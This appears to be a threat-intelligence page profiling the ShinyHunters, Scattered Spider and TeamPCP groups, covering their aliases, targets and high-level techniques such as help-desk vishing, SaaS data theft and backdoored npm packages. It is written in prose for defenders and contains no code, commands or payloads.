Threat Actors

ShinyHunters is a financially motivated data-theft and extortion collective that rose to prominence in 2020 by breaching dozens of companies and selling stolen databases on underground forums such as RaidForums and, later, BreachForums. Rather than encrypting victims, the group specializes in mass data exfiltration followed by public extortion via its own data-leak site. Google's Threat Intelligence Group tracks the financially motivated cluster behind the current wave as UNC6240, with related vishing and SaaS-theft activity attributed to clusters UNC6661 and UNC6671. Recent operations have pivoted from bulk database dumps toward targeted social engineering — help-desk vishing, victim-branded SSO/Okta phishing pages, and OAuth/connected-app abuse — to plunder SaaS platforms like Salesforce, SharePoint, DocuSign and Google Workspace before extortion.

Sources: Wikipedia · Malpedia

Related Briefs & Detections

Scattered Spider is a financially motivated, loosely organized collective of mostly native-English-speaking actors associated with the broader online community known as "The Com." Active since at least 2022, the group is best known for advanced social engineering — IT help-desk vishing, MFA-fatigue push bombing, and SIM-swapping — to defeat multi-factor authentication and seize initial access at large enterprises. After entry they register attacker-controlled MFA devices, abuse RMM tooling, federate rogue identity providers, and move laterally through cloud and on-prem estates before exfiltrating data and deploying ransomware (historically ALPHV/BlackCat, more recently DragonForce). Mandiant tracks the group as UNC3944, Microsoft as Octo Tempest, and Palo Alto Unit 42 as Muddled Libra.

Sources: Wikipedia · Malpedia

Related Briefs & Detections

TeamPCP is the threat actor behind a series of open-source software supply-chain compromises first widely documented in early 2026, including attacks on Aqua Security's Trivy, Checkmarx, the Bitwarden CLI, Telnyx, the SAP CAP npm ecosystem, and the TanStack/UiPath npm packages. Dubbed "Mini Shai-Hulud" for echoing the earlier Shai-Hulud npm worm, the group backdoors packages with npm preinstall hooks that fetch the Bun runtime and execute obfuscated stealers, harvesting developer and CI/CD credentials — including, in later waves, OIDC tokens read directly from GitHub Actions runner memory and password-vault data. Payloads self-propagate by republishing the victim's own packages and, in the TanStack wave, install a destructive daemon that wipes the user's home directory when the stolen GitHub token is revoked. As a recently-identified cluster, TeamPCP does not yet have established Wikipedia or Malpedia profiles; the supporting research lives in the related briefs below.

Related Briefs & Detections